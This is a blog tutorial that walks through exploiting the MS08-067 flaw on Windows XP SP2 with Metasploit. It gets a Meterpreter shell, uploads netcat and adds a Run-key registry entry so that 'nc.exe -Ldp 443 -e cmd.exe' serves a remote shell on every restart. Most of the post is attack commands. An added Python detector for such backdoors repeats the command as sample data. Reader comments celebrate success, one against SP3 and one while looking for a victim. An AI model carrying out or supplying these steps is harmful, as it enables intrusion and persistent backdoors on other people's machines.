Thursday, January 7, 2010

How to own a Windows XP Sp2 system using MS08-67 vulnerability and run netcat as backdoor with Meterpreter?


Microsoft Security Bulletin MS08-067 – Critical
DISCLAIMER:
Content provided in this blog can only be used for your own educational purposes. Using these hacks outside of your own computer or network is forbidden and strictly illegal. If you use these techniques in an illegal way you will be punished by law. Our articles and blogs are provided and created for testing internet security and for learning how to help the world build better security, how to close holes and backdoors, and for any other internet-security-related help and fixes.
Owners of this blog are not responsible for your illegal actions.
Executive Summary:
A remote code execution vulnerability exists in the Server service on Windows systems. The vulnerability is due to the service not properly handling specially crafted RPC requests. In this video we demonstrate how to make use of this vulnerability with the help of Metasploit and install a backdoor on Windows XP SP2 systems.

The generic lab setup for this demonstration will be as follows:



Consider a victim machine running Windows XP SP2.
To get its IP address, go to
START -> RUN, type ‘cmd’, then type ‘ipconfig’, which displays the IP address (10.10.1.102).


As the attacker’s machine, we use BackTrack 4.
Switching to BackTrack 4:

To get the IP address in BackTrack,
click the Konsole icon on the taskbar and type ‘ifconfig’ (10.10.1.105).

For this demonstration we will be working in the console mode of Metasploit Framework 3.

Change the present working directory to ‘/pentest/exploits/framework3’.
To run Metasploit, execute ‘./msfconsole’.
The Metasploit welcome screen displays the number of available exploits, payloads, encoders, etc.

Enter ‘search 067’ to find the ms08_067_netapi exploit module.
Now we need to tell Metasploit to use the ms08_067_netapi module; for this, type:
use windows/smb/ms08_067_netapi
‘show options’ displays the current settings and the settings that still need to be changed.
RHOST is the Remote Host; set RHOST by typing:
set RHOST <victim ip>

The ‘show payloads’ command lists all payloads that are compatible with the selected exploit.
Set the reverse_tcp payload by typing:
set PAYLOAD windows/meterpreter/reverse_tcp

Use the ‘show options’ command to check which options have been set and which are still required.
LHOST is the Local Host; set LHOST by typing:
set LHOST <attacker ip>

Use ‘show options’ to check the changed settings.

The ‘show targets’ command lists all available targets for the selected exploit module.

The ‘exploit’ command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

If everything goes well, you get the meterpreter shell.

To run a command on the victim’s machine, type:
execute -f cmd.exe -c

To get the victim’s shell, type:
interact 1

Now we will create a backdoor using netcat.
Close the current connection.

Open a new Konsole (konsole2) and copy netcat to the /tmp directory by typing:
cp /pentest/windows-binaries/tools/nc.exe /tmp

Type ‘cd /tmp’ to change the present working directory.

To list the files, type:
ls

Go back to konsole1.
To upload nc.exe into the victim’s system32 folder, type:
upload /tmp/nc.exe c:\\windows\\system32

We now work with the registry to have netcat execute on startup and listen on port 443.
Type:
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

To add netcat to the registry, type:
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe"

To check the entry just made in the registry, type:
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
Exit from the meterpreter shell.

Now netcat will be listening on port 443 even after every restart.
Restart Windows XP.

To check listening and open ports, type:
netstat -an
Netcat is listening on port 443.

To connect back to the victim’s machine, type:
telnet <victim ip> 443
This would again give you the victim’s shell.
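The two artifacts this procedure leaves on the host, a Run-key value starting nc.exe with -e cmd.exe and a new listener on TCP 443, are exactly what a defender should hunt for. The following is an added example and not part of the original article: a Python script that flags netcat-style entries in the text output of a Run-key query and reports listening ports that are missing from a host baseline. The two sample outputs are constructed, and the baseline port list is an assumption.

```python
import re

# Constructed sample of `reg query` output for the HKLM Run key (not from a real host)
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
"""

# Constructed sample of `netstat -an` output from the same host
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING
  TCP    10.10.1.102:139        0.0.0.0:0              LISTENING
"""

# One Run-key value per line: "<name>  REG_SZ|REG_EXPAND_SZ  <command>"
RUN_VALUE = re.compile(r"^\s*(.+?)\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$", re.M)
# nc / ncat / netcat binary anywhere in the command line
NETCAT_BIN = re.compile(r"\b(?:nc|ncat|netcat)(?:\.exe)?\b", re.I)
# "-e cmd.exe" (the e may be bundled with other flags): a shell bound to the socket
SHELL_BIND = re.compile(r"\s-[A-Za-z]*e\s+\S*cmd(?:\.exe)?\b", re.I)
# TCP listeners: capture the local port of every LISTENING line
NETSTAT_LISTEN = re.compile(r"^\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING\s*$", re.M)


def suspicious_run_entries(reg_output):
    """Return (name, command) pairs from Run-key output that look like a netcat shell backdoor."""
    return [(name, cmd) for name, cmd in RUN_VALUE.findall(reg_output)
            if NETCAT_BIN.search(cmd) or SHELL_BIND.search(cmd)]


def unexpected_listeners(netstat_output, baseline_ports):
    """Return listening TCP ports absent from the host's documented baseline, sorted."""
    ports = {int(p) for p in NETSTAT_LISTEN.findall(netstat_output)}
    return sorted(ports - set(baseline_ports))


if __name__ == "__main__":
    # Baseline for a stand-alone XP SP2 workstation is an assumption: RPC, NetBIOS, SMB only
    for name, cmd in suspicious_run_entries(SAMPLE_RUN_KEY):
        print(f"Run-key persistence: {name} -> {cmd}")
    for port in unexpected_listeners(SAMPLE_NETSTAT, [135, 139, 445]):
        print(f"Unexpected TCP listener on port {port}")
```

Beyond the check, the real fix for the entry point is to apply the MS08-067 update, since the persistence above only matters once the Server service has already been compromised.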

Conclusion
Undoubtedly MS08-067, which was used by Conficker and many worms of the same kind, is one of the biggest issues. So in this article we demonstrated how to use Metasploit, work with the MS08-067 exploit, own Windows XP SP2 systems and place netcat as a backdoor on the victim system.





4 comments:

Anonymous said...

wow!! It is very useful

Anonymous said...

be fantastic!
I apt-get bt 4 :) and I search victim

Anonymous said...

this works against SP3 as well

Anonymous said...

yeah it works against SP3, and Cycops, you guys are cool.. I have been trying for a long time and at last I got in. Cycops, you guys rock.